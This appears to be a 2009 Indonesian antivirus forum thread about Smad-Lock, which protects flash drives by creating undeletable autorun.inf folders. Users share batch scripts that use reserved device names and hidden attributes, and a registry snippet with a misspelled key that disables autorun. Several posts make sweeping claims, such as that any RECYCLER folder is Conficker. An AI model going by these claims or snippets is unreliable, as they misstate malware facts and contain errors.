smadav akan bertahan ribuan tahun jika mendapat bantuan dari kalian semua...baik bantuan berupa laopran bug,kritik, dan saran hingga bantuan berupa dana segar... :) :) :)


wkwkwkwk smadav akan bertahahn sampe hari kiamat ga?...just kiding... ;D ;D
Judul: Re: Smad-Lock
Ditulis oleh: Zai pada Juni 16, 2009, 12:01:20 PM
gimana cara mendelete folder recycler d komput ? :-\

Folder Recycler di harddisk komputer adalah tempat file-file yang sudah dihapus tapi masih ada di Recycle Bin, beda dengan yang ada di flashdisk, itu pasti virus conficker :D
Judul: Re: Smad-Lock
Ditulis oleh: Deny MiniDwarf pada Juni 18, 2009, 11:33:04 AM





gimana cara mendelete folder recycler d komput ? :-\

coba pake si bebek kuning...siapa tau itu virus recycler...
Judul: Re: Smad-Lock
Ditulis oleh: Ajojing pada Juni 19, 2009, 06:20:23 PM
kegunaan folder recyler di fd tuh gunanya apa sih? apa sama dgn recyler di hd?  ???
Judul: Re: Smad-Lock
Ditulis oleh: Zai pada Juni 20, 2009, 06:07:41 AM
kegunaan folder recyler di fd tuh gunanya apa sih? apa sama dgn recyler di hd?  ???

FOlder Recycler di FD adalah 100% Virus Conficker :D
Judul: Re: Smad-Lock
Ditulis oleh: Ajojing pada Juni 20, 2009, 02:09:51 PM
jadi recyler di fd bener2 ga ada gunnanya?


ohh, yaudah :D
Judul: Re: Smad-Lock
Ditulis oleh: RefrizaL pada Juni 20, 2009, 05:47:54 PM
ada lagi 1, yg mirip recycler.. namanya NADFOLDER
mungkin sisanya nadya,... didetek sebagai virus aja mas..
Judul: Re: Smad-Lock
Ditulis oleh: kido pada Juni 25, 2009, 04:08:50 PM
Mas, aku pernah baca di www.vaksin.com/2007/0507/autoinfect.htm, kalo autorun di flashdisk gak cuma autorun.inf aja, tapi juga folder.htt sama desktop.ini. Mungkin bisa ditambahin smadlock buat autorun yang lain - lain?
Judul: Re: Smad-Lock
Ditulis oleh: izul pada Juni 25, 2009, 10:52:59 PM
nih tak ksh file u/ bqn folder ky smadlock. tinggal pilih drivenya-trus ketikan nm folder yg mw dibwt(desktop.ini, folder.htt, dll terserah...).. :D :D
save dgn extensi bat y,ex : SmadLock.bat

------------START--------------------
echo off
cls
REM — ubah warna
color b
REM — ubah judul
mode 33,18
title SmadLock CMD  created by izuL

:CONFIRM
echo ________________________________
echo    Mau pilih mana ni..?
echo --------------------------------

echo 1. Buat folder
echo 2. Delete folder
set/p "pilih=Pilihan 1/2 >"
if %pilih%== 1 goto BUAT
if %pilih%== 2 goto DEL
echo Invalid choice.
goto CONFIRM

:BUAT
cls
echo ________________________________
echo       Buat folder
echo --------------------------------
set/p "lokasi=Drive      >"
set/p "nama=Nama Folder   >"
del \\?\%lokasi%:\%nama%
md \\?\%lokasi%:\%nama%\con\aux\nul
attrib %lokasi%:\%nama% +h +s +r
goto end

:DEL
cls
echo ________________________________
echo       Delete folder
echo --------------------------------
set/p "lokasi=Drive      >"
set/p "nama=Nama Folder   >"
attrib %lokasi%:\%nama% -h -s -r
rd \\?\%lokasi%:\%nama% /s /q
goto end
--------------END-------------------------
Judul: Re: Smad-Lock
Ditulis oleh: kido pada Juni 26, 2009, 11:41:07 AM
Sipp, makasi mas
Judul: Re: Smad-Lock
Ditulis oleh: Jastis pada Juni 27, 2009, 10:10:05 AM
bahasa program apan tuch mas....?
jadi tertarik nih....
Judul: Re: Smad-Lock
Ditulis oleh: kido pada Juni 27, 2009, 10:21:24 AM
Itu bahasa pemrograman .bat, bikinnya pake notepad, nanti jalannya pake command prompt
Judul: Re: Smad-Lock
Ditulis oleh: Jastis pada Juni 27, 2009, 10:29:54 AM
Kutip
Itu bahasa pemrograman .bat, bikinnya pake notepad, nanti jalannya pake command prompt

brarti ngejalaninnya di Command prompt gitu.....
caranya gimana ??? :)
Judul: Re: Smad-Lock
Ditulis oleh: kido pada Juni 27, 2009, 10:34:23 AM
filenya dicopy ke notepad, terus di save as sebagai smadlock.bat. terus didouble click file tadi, keluar window command prompt..
Judul: Re: Smad-Lock
Ditulis oleh: Jastis pada Juni 27, 2009, 10:37:06 AM
gue cabain dulu ach.....
hehehe....
Judul: Re: Smad-Lock
Ditulis oleh: kambeeng pada Juni 27, 2009, 10:47:38 AM
nih tak ksh file u/ bqn folder ky smadlock. tinggal pilih drivenya-trus ketikan nm folder yg mw dibwt(desktop.ini, folder.htt, dll terserah...).. :D :D
save dgn extensi bat y,ex : SmadLock.bat

------------START--------------------
echo off
cls
REM — ubah warna
color b
REM — ubah judul
mode 33,18
title SmadLock CMD  created by izuL

:CONFIRM
echo ________________________________
echo    Mau pilih mana ni..?
echo --------------------------------

echo 1. Buat folder
echo 2. Delete folder
set/p "pilih=Pilihan 1/2 >"
if %pilih%== 1 goto BUAT
if %pilih%== 2 goto DEL
echo Invalid choice.
goto CONFIRM

:BUAT
cls
echo ________________________________
echo       Buat folder
echo --------------------------------
set/p "lokasi=Drive      >"
set/p "nama=Nama Folder   >"
del \\?\%lokasi%:\%nama%
md \\?\%lokasi%:\%nama%\con\aux\nul
attrib %lokasi%:\%nama% +h +s +r
goto end

:DEL
cls
echo ________________________________
echo       Delete folder
echo --------------------------------
set/p "lokasi=Drive      >"
set/p "nama=Nama Folder   >"
attrib %lokasi%:\%nama% -h -s -r
rd \\?\%lokasi%:\%nama% /s /q
goto end
--------------END-------------------------


Bro ... Kalau gua cek kayaknya ada yang salah sama kode ente coba cek dech :D
Judul: Re: Smad-Lock
Ditulis oleh: Jastis pada Juni 27, 2009, 10:56:57 AM
gue dah coba,tapi...

sewaktu eksekusi folder yg kita inginkan gak muncul.????
Judul: Re: Smad-Lock
Ditulis oleh: geostigma pada Juni 27, 2009, 11:04:16 AM
tu foldernya bisa aman dari virus penyusup ga'?
pernah kejadian file .inf punya Smadav kena infeksi, trus didelete (waktu itu yang detect Avert Stinger kalo ga' salah...)
Judul: Re: Smad-Lock
Ditulis oleh: izul pada Juni 27, 2009, 12:14:34 PM
Bro ... Kalau gua cek kayaknya ada yang salah sama kode ente coba cek dech :D

salah dimananya ni bro?? :-\ cz gw dah cb bs ko.. :D



gue dah coba,tapi...
sewaktu eksekusi folder yg kita inginkan gak muncul.????

ya gak muncul atuh, kn di set jd hidden+system foldernya,,tp te2p ad tu foldernya..
ex qt mw bqn folder desktop.ini di FD qt (mis drive K)
Drive >k
Nama folder >desktop.ini

bukti: cb aj bqn file/folder lgi dgn nma desktop.ini di FDnya (manual y,bkn pke file bat td) psti ga bs(cz udh ad, n g bs sma nmnya)  ;)



tu foldernya bisa aman dari virus penyusup ga'?
pernah kejadian file .inf punya Smadav kena infeksi, trus didelete (waktu itu yang detect Avert Stinger kalo ga' salah...)

mksudny gmn y? ???
virus te2p bs mnjlajahi/mnyusp FOLDER yg qt bwt pke file bat td, tp y ngapain juga qta kn g naroh file didlmnya.. :)

stau sya yg dbwt smadlock itu FOLDER bkn FILE, n blm ad virus yg infeksi FOLDER kynya (adnya infeksi FILE). n smadlock.bat ini jg yg dbwt FOLDER ko.. :D



Tmbhan : untuk nma folder yg dibwt jgn pke spasi y (g brhasil soalnya), klo mw bs ditmbhakn underscore
ex : folder_baru  baru bisa

klo mw bs dtmbahkan sndiri y codenya, jd qta bs bwt dimana aj (ga msti di root drive)..
n biar bs bwt FILE jg bkn cm FOLDER, ex : FILE recycler, jd conflicker g bs bqn FOLDER recycler di root drive qta..(tp ga tw conflicker di progrm ngapus FILE recycler g...)  :P :P
Judul: Re: Smad-Lock
Ditulis oleh: amirdtr pada Juni 27, 2009, 12:22:02 PM
@izul:
Biyung... eh.. bingung.... ???
Judul: Re: Smad-Lock
Ditulis oleh: amirdtr pada Juni 27, 2009, 12:26:33 PM
nih tak ksh file u/ bqn folder ky smadlock. tinggal pilih drivenya-trus ketikan nm folder yg mw dibwt(desktop.ini, folder.htt, dll terserah...).. :D :D
save dgn extensi bat y,ex : SmadLock.bat

------------START--------------------
echo off
cls
REM — ubah warna
color b
REM — ubah judul
mode 33,18
title SmadLock CMD  created by izuL

:CONFIRM
echo ________________________________
echo    Mau pilih mana ni..?
echo --------------------------------

echo 1. Buat folder
echo 2. Delete folder
set/p "pilih=Pilihan 1/2 >"
if %pilih%== 1 goto BUAT
if %pilih%== 2 goto DEL
echo Invalid choice.
goto CONFIRM

:BUAT
cls
echo ________________________________
echo       Buat folder
echo --------------------------------
set/p "lokasi=Drive      >"
set/p "nama=Nama Folder   >"
del \\?\%lokasi%:\%nama%
md \\?\%lokasi%:\%nama%\con\aux\nul
attrib %lokasi%:\%nama% +h +s +r
goto end

:DEL
cls
echo ________________________________
echo       Delete folder
echo --------------------------------
set/p "lokasi=Drive      >"
set/p "nama=Nama Folder   >"
attrib %lokasi%:\%nama% -h -s -r
rd \\?\%lokasi%:\%nama% /s /q
goto end
--------------END-------------------------



Ini adalah cara membuat folder autorun.inf dengan cara Command Prompt.
Judul: Re: Smad-Lock
Ditulis oleh: Jastis pada Juni 27, 2009, 01:24:58 PM
Kutip
Quote from: Jastis on Today at 10:56:57 AM
gue dah coba,tapi...
sewaktu eksekusi folder yg kita inginkan gak muncul.?

ya gak muncul atuh, kn di set jd hidden+system foldernya,,tp te2p ad tu foldernya..
ex qt mw bqn folder desktop.ini di FD qt (mis drive K)
Drive >k
Nama folder >desktop.ini

bukti: cb aj bqn file/folder lgi dgn nma desktop.ini di FDnya (manual y,bkn pke file bat td) psti ga bs(cz udh ad, n g bs sma nmnya)

hehehe..
Mas Izul..ternyata emang ada koq...tapi ketahuannya setelah gue scan drive-nya pake Smadav...

Tapi klo extention-nya *.ini,koq fodernya banyak amat didalam folder yg telah kita buat..?
ada folder con..dan lain...emang sengaja gitu ya..? ;)
Judul: Re: Smad-Lock
Ditulis oleh: kido pada Juni 27, 2009, 02:08:04 PM
con, aux, nul, itu folder yag bisa diakses lewat Windows Explorer
Memang gitu, kayak autorun.inf nya Smadlock kan juga gitu, isinya con, aux, nul

Sipp, mas Izul! Programer hebat loe...
Judul: Re: Smad-Lock
Ditulis oleh: Jastis pada Juni 27, 2009, 02:31:48 PM
Kutip
con, aux, nul, itu folder yag bisa diakses lewat Windows Explorer
Memang gitu, kayak autorun.inf nya Smadlock kan juga gitu, isinya con, aux, nul

folder2 tersebut bisa digunakan utk nyimpan data ??? ;)
Judul: Re: Smad-Lock
Ditulis oleh: kido pada Juni 27, 2009, 02:35:29 PM
tapi manabisa masuk nul.
itu bukan untuk ngelock data, itu cuma biar file autorun.inf, dll nggak bisa dihapus
kalo untuk fungsi smadlock yang buat proteksi data, itu pake folder yang ada karakter unicodenya, jadi virus sangat sulit hapusnya..
memang bisa buat simpen data, tapi bisa dihapus
Judul: Re: Smad-Lock
Ditulis oleh: Jastis pada Juni 29, 2009, 03:47:35 PM
tapi kan kita bisa nyimpan data didalam folder yg telah diuat......
Judul: Re: Smad-Lock
Ditulis oleh: kido pada Juni 29, 2009, 03:53:10 PM
memang...
tapi yang folder nul mana bisa diakses pake akses biasa?
kalo folder yang selain nul, isinya bisa dihapus gampang..
Judul: Re: Smad-Lock
Ditulis oleh: izul pada Juni 30, 2009, 09:28:10 AM
@amirdtr
file bat itu ga trbtas u/ buat folder autorun.inf doank,tp bs ap aj ko(desktop.ini,folder.htt,dll).. :)


@Jastis
y bkn tnpa alesan knpa folder autorun.inf atw yg lainnya dibuat berlapis2 didlmnya (con\aux\nul)..
cb tnya mas Zai y! sy sih cb samakn aj dgn autorun.inf buatan smadlock.. :) (munqn mksudnya biar lbh ssh dihpus klo brlapis2 gtu,...)


tapi manabisa masuk nul.
itu bukan untuk ngelock data, itu cuma biar file autorun.inf, dll nggak bisa dihapus
kalo untuk fungsi smadlock yang buat proteksi data, itu pake folder yang ada karakter unicodenya, jadi virus sangat sulit hapusnya..
memang bisa buat simpen data, tapi bisa dihapus
y btul folder2 yg qt buat pke smadlock.bat kmaren tuh bkn dikhususkan/difungsikn u/ nyimpen data didlmnya (wlaupun emang bs simpen dsna) agk repot klo qta msti set atribute bolak-balik.,n sengaja sya sertakan smover-nya(smadlock remover,,bhasanya mas Darmal.. ;) ) klo swktu2 qta udh ga lgi pke tuh folder)


tapi kan kita bisa nyimpan data didalam folder yg telah diuat......
nnti deh saya cb2 bkin folder khusus u/ lock data (tak cba2 dlu)..tp bs diupload ksini ga y klo file zip/rar??  ???
Next on SmadLock+Smover, MyLocker, ProcessMgr...
Judul: Re: Smad-Lock
Ditulis oleh: Zai pada Juni 30, 2009, 09:31:01 AM
Smadav 2009 Rev. 5 sudah ada fitur Lock & Unlock Manager. Bisa juga untuk membuat Smad-Lock di fixed drive misalnya di hard-disk :D
Judul: Re: Smad-Lock
Ditulis oleh: Jastis pada Juni 30, 2009, 09:49:03 AM


klo data-nya ber-extension rar,zip dll..disimpan didalam folder Lock/Smad-Lock klo dijalankan error....koq gitu sih....????
Judul: Re: Smad-Lock
Ditulis oleh: kido pada Juni 30, 2009, 09:53:03 AM
Rasanya itu karena file yang dijalankan harus dikeluarkan dari folder smadlock dahulu...
Judul: Re: Smad-Lock
Ditulis oleh: Jastis pada Juni 30, 2009, 09:56:17 AM
Kutip
Rasanya itu karena file yang dijalankan harus dikeluarkan dari folder smadlock dahulu...

Apa semua Lock data cara kerjanya seperti itu ya ??? :)
Judul: Re: Smad-Lock
Ditulis oleh: kido pada Juni 30, 2009, 10:04:02 AM
mungkin..
locknya usb ada beberapa yang seperti itu...
Judul: Re: Smad-Lock
Ditulis oleh: izul pada Juni 30, 2009, 11:57:09 AM
Smadav 2009 Rev. 5 sudah ada fitur Lock & Unlock Manager. Bisa juga untuk membuat Smad-Lock di fixed drive misalnya di hard-disk :D
wah bgus tuh cz smadlock suka gagal wktu bqn di FD  :) mkanya sya iseng bqn smadlock.bat kmren itu, biar bs manual n bs dbwt jg di HD dgn nm bebas (bkn mksud nyaingin smadav loh, hehehe.. :D  :D)
kpan ni mas Zai Rev 5 nya kluar?


klo data-nya ber-extension rar,zip dll..disimpan didalam folder Lock/Smad-Lock klo dijalankan error....koq gitu sih....????
karena tdk smua aplikasi sdh support Unicode, ad bbrapa yang tdk jdnya error deh
nah solusnya qta kluarkan dlu file/aplikasi itu dari folder unicodenya, br bs dijlankan..
Judul: Re: Smad-Lock
Ditulis oleh: kido pada Juni 30, 2009, 12:30:14 PM
Kutip
wah bgus tuh cz smadlock suka gagal wktu bqn di FD  :) mkanya sya iseng bqn smadlock.bat kmren itu, biar bs manual n bs dbwt jg di HD dgn nm bebas (bkn mksud nyaingin smadav loh, hehehe.. :D  :D)
kpan ni mas Zai Rev 5 nya kluar?


Semakin bagus kalo ada unlocknya karena beberapa program di UFD saya (PortableApps) membutuhkan autorun.inf untuk jalan..
Judul: Re: Smad-Lock
Ditulis oleh: Jastis pada Juni 30, 2009, 02:13:44 PM
Kode: [Pilih]
DisableRegistry.vbs
CreateObject ("Wscript.Shell").regwrite
"HKCU\Software\Microsoft\Windows\CurrentVersion\Polices\Explorer\NoDriveTypeAutoRun",255,
"REG_DWORD"


apa code program ini benar ya ???? :D :D

klo mw mendisable autorun dengan VBScrip
Judul: Re: Smad-Lock
Ditulis oleh: kido pada Juli 01, 2009, 09:01:07 AM
Silahkan liat cara pencegahan autoinfect via http://www.vaksin.com/2007/0507/autoinfect.htm
Judul: Re: Smad-Lock
Ditulis oleh: Jastis pada Juli 02, 2009, 04:15:02 PM
nich termasuk virus gak ????

(http://photos-e.ak.fbcdn.net/hphotos-ak-snc1/hs161.snc1/6014_1090355779778_1253007361_30211836_5699491_s.jpg)


dan yg ini....??

(http://photos-d.ak.fbcdn.net/hphotos-ak-snc1/hs161.snc1/6014_1090355739777_1253007361_30211835_1441200_s.jpg)
Judul: Re: Smad-Lock
Ditulis oleh: amirdtr pada Juli 02, 2009, 04:58:59 PM
nich termasuk virus gak ????

(http://photos-e.ak.fbcdn.net/hphotos-ak-snc1/hs161.snc1/6014_1090355779778_1253007361_30211836_5699491_s.jpg)


dan yg ini....??

(http://photos-d.ak.fbcdn.net/hphotos-ak-snc1/hs161.snc1/6014_1090355739777_1253007361_30211835_1441200_s.jpg)

Maaf... fotonya kekecilan....
Judul: Re: Smad-Lock
Ditulis oleh: kido pada Juli 02, 2009, 08:24:58 PM
Itu kan Norman Malware Cleaner, kalo itu memang didetek, ya kemungkinan besar virus.
Tolong fotonya diperbesar supaya bisa dilihat, bro..
Judul: Re: Smad-Lock
Ditulis oleh: ★ harboot ★ pada Juli 02, 2009, 09:55:21 PM
wew.. di topik lain ada gambar kegedean..
disini malah imut amat..

(admin tolong set gambar forum, minimal 200 px, max 600 px)
(atw angkat gw jd admin 1 hari dunkz, he2)
Judul: Re: Smad-Lock
Ditulis oleh: kido pada Juli 03, 2009, 10:59:01 AM
maaf mas, ini tempatnya bukan untuk Norman Malware Cleaner

harapan saya di rev 5 semoga bisa detek conficker dan membersihkannya sampai tuntas :D
Judul: Re: Smad-Lock
Ditulis oleh: izul pada Juli 04, 2009, 03:15:45 PM
New smadLock akan segera dishare.. :)
Judul: Re: Smad-Lock
Ditulis oleh: kido pada Juli 04, 2009, 03:19:32 PM
New SmadLock apa?
Fitur apa yang ditambahkan?
Judul: Re: Smad-Lock
Ditulis oleh: amirdtr pada Juli 05, 2009, 11:43:08 AM
nich termasuk virus gak ????

(http://photos-e.ak.fbcdn.net/hphotos-ak-snc1/hs161.snc1/6014_1090355779778_1253007361_30211836_5699491_s.jpg)


dan yg ini....??

(http://photos-d.ak.fbcdn.net/hphotos-ak-snc1/hs161.snc1/6014_1090355739777_1253007361_30211835_1441200_s.jpg)

Oalah... rupanya diupload di Facebook.... Di upload di PhotoBucket saja atau Picasa.
Judul: Re: Smad-Lock
Ditulis oleh: kido pada Juli 05, 2009, 03:39:55 PM
BIsa upload di www.imagehosting.com..
Biasanya aku upload di sana, lebih besar (sampe kegedean)
Judul: Re: Smad-Lock
Ditulis oleh: ★ harboot ★ pada Juli 05, 2009, 03:41:47 PM
klo tidak upload ke Uploadhouse.com
klo photobucket servernya lamban, byk yg pake..

OOT!!

SmadLock uda bisa ngunci semua drive dan bisa diatur (En/Disable).
masih bisa di rename.. wedew.
Judul: Re: Smad-Lock
Ditulis oleh: Jastis pada Juli 05, 2009, 04:13:45 PM
bushet dech...

gbrnya dah sempat terhapus... :D :D


tuch Autorun.ANT........
Judul: Re: Smad-Lock
Ditulis oleh: kido pada Juli 05, 2009, 04:15:10 PM
Yang rev5 udah bisa pasang SmadLock di HDD, UFD, MMC, dan media - media laen, bisa diunlock lagi..
Keren!!
Judul: Re: Smad-Lock
Ditulis oleh: Jastis pada Juli 05, 2009, 04:19:35 PM
yg blom cara hilangin Autorun-nya bro....
Judul: Re: Smad-Lock
Ditulis oleh: kido pada Juli 05, 2009, 04:21:33 PM
Pake Smadlock.bat nya buatannya Izul di bagian lain thread ini kalo ga salah..
Judul: Re: Smad-Lock
Ditulis oleh: izul pada Juli 06, 2009, 09:32:08 AM
nih tak share lg tools kecil buatanku  :D.,tp gw set trbtas cm 25x pmakaian cz msh byk kkurangannya..
blm brupa GUI msh app sderhana aj (skr br mw dibkin rencnanya), silkan tmn2 kmbangkn..

Br ad 3 fungsi (lain kali mungkin tmbahkn klo smpet).. :)
1.smadlock, yg sdikit ditmbah proteksinya (anti-unlocker), akn bnr2 ssh diapus
2.myLocker, u/ mnyimpen data shingga akn super aman dgn proteksi ganda (stlah dilock)
3. processmgr, ni cuma tmbhan aj

ukuran file +/- 40kb, silakan donlod klo mw..
Judul: Re: Smad-Lock
Ditulis oleh: Rizzal pada Juli 06, 2009, 01:05:14 PM
 :-\Kalo ada autorun.inf di FD g bisa ne lock ya?
Judul: Re: Smad-Lock
Ditulis oleh: kido pada Juli 06, 2009, 02:08:45 PM
Maksudnya Smadlock itu bikin folder autorun.inf yang bebas virus supaya tidak bisa diover write autorun.inf virus..
Judul: Re: Smad-Lock
Ditulis oleh: amirdtr pada Juli 07, 2009, 08:29:02 AM
Kesimpulan:
SmadLock adalah fitur yang membuat flashdisk atau disk drive Anda terkunci dengan cara membuat folder 'sakti' autorun.inf, sehingga virus tidak dapat membuat dan mengeksekusi autorun.inf.
Judul: Re: Smad-Lock
Ditulis oleh: kido pada Juli 07, 2009, 08:37:36 AM
Sama satu lagi, SmadLock juga menyediakan folder khusus dengan karakter unicode sehingga sulit dihapus/dimodifikas virus dan dapat digunakan untuk membantu melindungi data Anda dari serangan virus.
Judul: Re: Smad-Lock
Ditulis oleh: amirdtr pada Juli 07, 2009, 08:49:54 AM
Bagaimana cara menghapus folder autorun.inf?

1. Jalankan Command Prompt dengan mengetikkan CMD pada Start Search (Vista / Se7en) atau Run... (Windows + R; untuk XP / Vista / Se7en).

2. Arahkan ke flashdisk Anda, dengan mengetikkan:
Kode: [Pilih]
(namadrive)(contoh:
Kode: [Pilih]
F:
3. Arahkan ke folder autorun.inf, dengan mengetikkan:
Kode: [Pilih]
CD (drive)/autorun.inf/(contoh:
Kode: [Pilih]
CD F:/autorun.inf
4. Delete subfolder nul, con dan aux. Caranya:
Kode: [Pilih]
RD aux /SJawab dengan Y bila ada pertanyaan.
(contoh:
Kode: [Pilih]
RD aux /S
5. Delete folder autorun.inf
Kode: [Pilih]
CD..
Kode: [Pilih]
RD F:/autorun.inf
6.
..........THE END.........

Ngomong-ngomong, saya belum pernah mencoba cara ini. :D Ada yang berhasil? ???  :-\
Judul: Re: Smad-Lock
Ditulis oleh: Jastis pada Juli 07, 2009, 09:04:26 AM
coba dulu ach......
Judul: Re: Smad-Lock
Ditulis oleh: izul pada Juli 07, 2009, 09:27:13 AM
LiteFull, blm ad tmbhan tp dri yg sblumnya cm pnggunaannya tdk dbtasi aj..(mmpung msh bs ngenet gw upload dh  ;D) n jg msh dlm cli blm gui,
-fitur smadlock gw tmbhkan sedikit bar lbh powerfull (anti-unlocker dan sjenisnya)
-fitur folder my-locker gbungan teknik proteksi folder dgn unicode, redirecting, nul folder n superhidden (stelah dilock tntunya), dan stlah gw cb blm ad yg bs mnembus proteksi brlapis2 ini..
-n processmgr brdsarkan PID byasa
Judul: Re: Smad-Lock
Ditulis oleh: kido pada Juli 07, 2009, 09:54:09 AM
Sippp toolsnya..
Tes dulu..
Dibangun berdasarkan apa tu?
Judul: Re: Smad-Lock
Ditulis oleh: Zai pada Juli 07, 2009, 10:20:31 AM
nih tak share lg tools kecil buatanku  :D.,tp gw set trbtas cm 25x pmakaian cz msh byk kkurangannya..
blm brupa GUI msh app sderhana aj (skr br mw dibkin rencnanya), silkan tmn2 kmbangkn..

Br ad 3 fungsi (lain kali mungkin tmbahkn klo smpet).. :)
1.smadlock, yg sdikit ditmbah proteksinya (anti-unlocker), akn bnr2 ssh diapus
2.myLocker, u/ mnyimpen data shingga akn super aman dgn proteksi ganda (stlah dilock)
3. processmgr, ni cuma tmbhan aj

ukuran file +/- 40kb, silakan donlod klo mw..

Ok, saya coba lihat, siapa tahu ada teknik yang masih lebih bagus daripada Smad-Lock :D
Judul: Re: Smad-Lock
Ditulis oleh: kido pada Juli 07, 2009, 10:30:55 AM
Kalo ada, ditambahin ya mas..
Judul: Re: Smad-Lock
Ditulis oleh: kochi pada Juli 09, 2009, 12:36:32 PM
well, gw termasuk orang yg konservatif kali ya... tapi kalo ada file yg ga bisa dihapus di fd gw, gw jadi merasa ga punya kontrol ats semua file-file gw, terlepas dari kemungkinan ada virus atau tidak.... well im not so fond of smad-lock features, but i really do like the way that smad-lock prevent viruses from injecting my fd's...  :)
Judul: Re: Smad-Lock
Ditulis oleh: kido pada Juli 09, 2009, 12:43:13 PM
Glad you like Smadav.
For information, SmadLock autorun.inf protection creates an undeletable clean autorun.inf virus, so virus cannot put their autorun.inf file in the UFD.
Judul: Re: Smad-Lock
Ditulis oleh: Rizzal pada Juli 09, 2009, 02:25:38 PM
 :DMas Zai di aplikasi mas tadi ada fasilitas buad smadlock yang buat folder desktop.ini
apa ada firus yang buat file desktop.ini ???
Judul: Re: Smad-Lock
Ditulis oleh: kido pada Juli 09, 2009, 02:27:19 PM
Kayaknya kalo ga salah udah ada, tapi lupa nama virusnya :D
Judul: Re: Smad-Lock
Ditulis oleh: Rizzal pada Juli 09, 2009, 02:34:09 PM
 >=) bukanya ada file desktop.ini yang buat ganti tampilan folder?
Judul: Re: Smad-Lock
Ditulis oleh: kido pada Juli 09, 2009, 02:36:40 PM
File desktop.ini kan macem - macem gunanya, biasanya untuk konfigurasi folder
Tapi bisa disalahgunakan jadi virus..
Judul: Re: Smad-Lock
Ditulis oleh: Rizzal pada Juli 09, 2009, 02:49:40 PM
 8) Gimana kalo smadav buat folder aman autorun.inf+desktop.ini+recycler
Soalnya aku sering dapet folder recycler yang isi dalemnya susah di hapus+bikin file corupt ~x(
Judul: Re: Smad-Lock
Ditulis oleh: kido pada Juli 09, 2009, 02:55:20 PM
Bisa, pake toolnya mas Izul lupa dimana (kalo ga di thread ini ya di Kritik dan Saran Smadav 2009) :D
Judul: Re: Smad-Lock
Ditulis oleh: Rizzal pada Juli 09, 2009, 03:06:06 PM
 :D wow
yang folder kunci recycler vada belum?
Judul: Re: Smad-Lock
Ditulis oleh: kido pada Juli 09, 2009, 03:08:04 PM
foldernya tergantung inputan pengguna, namanya terserah :D
Judul: Re: Smad-Lock
Ditulis oleh: Rizzal pada Juli 09, 2009, 03:13:53 PM
 \m/ caranya?
Judul: Re: Smad-Lock
Ditulis oleh: kido pada Juli 09, 2009, 03:16:22 PM
Coba liat di page 6 thread ini.. :D
Judul: Re: Smad-Lock
Ditulis oleh: akanglil pada Juli 19, 2009, 11:38:32 PM
temen ane FD nya ke lock sama smadav, gmn buka nya?  :-\
Judul: Re: Smad-Lock
Ditulis oleh: ★ harboot ★ pada Juli 19, 2009, 11:40:04 PM
smadav 5 udah bisa buka.. cek lalu unlock..
Judul: Re: Smad-Lock
Ditulis oleh: kido pada Juli 20, 2009, 04:18:16 PM
Ada fiturnya di Smadav rev 5.1 ato coba softwarenya Izul
Judul: Re: Smad-Lock
Ditulis oleh: izul pada Juli 22, 2009, 08:18:26 PM
share lg tmbhan dri yg sblumnya redirecting utk folder yg diproteksi(yg sblumnya ga ad)..utk nm terserah/bebas folder ap yg mw dibuat..ext *.bat

---------------------START-------------------------------
echo off
cls
REM — ubah warna
color a
REM — ubah judul
mode 33,18
title SmadLock CMD  created by izuL

:CONFIRM
echo ________________________________
echo    Mau pilih mana ni..?
echo --------------------------------
echo.
echo [1]. LOCK folder
echo [2]. UN-LOCK folder
echo.
set/p "pilih=Pilihan > "
if %pilih%== 1 goto BUAT
if %pilih%== 2 goto DEL
echo Invalid choice
goto CONFIRM

:BUAT
cls
echo ________________________________
echo       LOCK folder
echo --------------------------------
echo.
set/p "lokasi=Drive          > "
set/p "nama=Nama Folder   > "
del \\?\%lokasi%:\%nama%
md \\?\%lokasi%:\%nama%\con\aux\nul
(
echo [.ShellClassInfo]
echo clsid={2559a1f2-21d7-11d4-bdaf-00c04f60b9f0}
) > %lokasi%:\%nama%\desktop.ini
cls
attrib +h +s +r %lokasi%:\%nama%\desktop.ini
attrib %lokasi%:\%nama% +h +s +r
goto end

:DEL
cls
echo ________________________________
echo       UN-LOCK folder
echo --------------------------------
echo.
set/p "lokasi=Drive          > "
set/p "nama=Nama Folder   > "
attrib %lokasi%:\%nama% -h -s -r
rd \\?\%lokasi%:\%nama% /s /q
goto end
--------------END-------------------------


atau pke yg ni (file attachment),sm fungsinya dgn smdlock cm lbh ssh diapusnya..
Judul: Re: Smad-Lock
Ditulis oleh: kido pada Juli 23, 2009, 03:53:23 PM
Wow...
Kucoba dulu :bd
Judul: Re: Smad-Lock
Ditulis oleh: joeedmund pada Juli 30, 2009, 08:05:03 PM
wah..
ngga bisa Copy-Paste ke FD  ~x(
walaupun udah di UNLOCK
 ~x(
Judul: Re: Smad-Lock
Ditulis oleh: kido pada Juli 30, 2009, 08:07:55 PM
@joeedmund
Ada pesan errornya? Kan bisa macem - macem, bisa karena kesalahan software maupun hardware
Judul: Re: Smad-Lock
Ditulis oleh: abcX pada Agustus 16, 2009, 10:53:28 PM
nanya donk,
Kutip
- Dalam folder ini sebenarnya Anda dapat mengisi file yang bukan berjenis dokumen office,
tapi sebaiknya ketika Anda membuka file tersebut jangan langsung di dalam folder ini,
Anda dapat memindahkan file tersebut keluar folder ini terlebih dahulu sebelum membukanya.

1. misal gw taruh file .exe ke dalam folder SMAD-LOCK,
truz ga boleh dijalanin di dalam folder tsb kah ?
mengapa & apa efek samping na ?

2. Misal mw buka file .ppt,
harus di copy ke luar folder dulu, baru dibuka.
begitu kah ?
memang na knp, klo dibuka di dalam folder & apa efek samping na ?

Thx.
Judul: Re: Smad-Lock
Ditulis oleh: kido pada Agustus 17, 2009, 10:48:32 AM
Beberapa program tidak kompatibel dengan segitiga yang ada di nama folder smadlock.. sehingga bisa menimbulkan error saat menjalankan file..
Judul: Re: Smad-Lock
Ditulis oleh: amirdtr pada Agustus 17, 2009, 03:43:20 PM
Saya jadi penasaran dengan artikel tentang SmadLock ini: :-\  SILAKAN DIBACA:
http://fazriesoft.blogspot.com/2009/07/konsep-proteksi-flashdisk-smad-lock.html

Ada komentar? ??? :-\
Judul: Re: Smad-Lock
Ditulis oleh: ★ harboot ★ pada Agustus 17, 2009, 06:50:57 PM
@abcX..
Nambah jawaban kido..
Tidak banyak Virus yg mendukung unicode.
Jd mereka sulit mengakses Folder SmadAV ini,
begitu juga dgn bbrp software, lebih baik kamu copy keluar dulu,
baru jalankan..

@amir..
tidak tau benar atw tdk 100%..
tp soal unicode emank jarang ada org kasih nama pakai ini,
malahan windows kagak dukung klo mw ngasih nama langsung.
jd buat apa repot2 bikin virus untuk membaca unicode ini?
Judul: Re: Smad-Lock
Ditulis oleh: akanglil pada Agustus 18, 2009, 07:34:02 AM
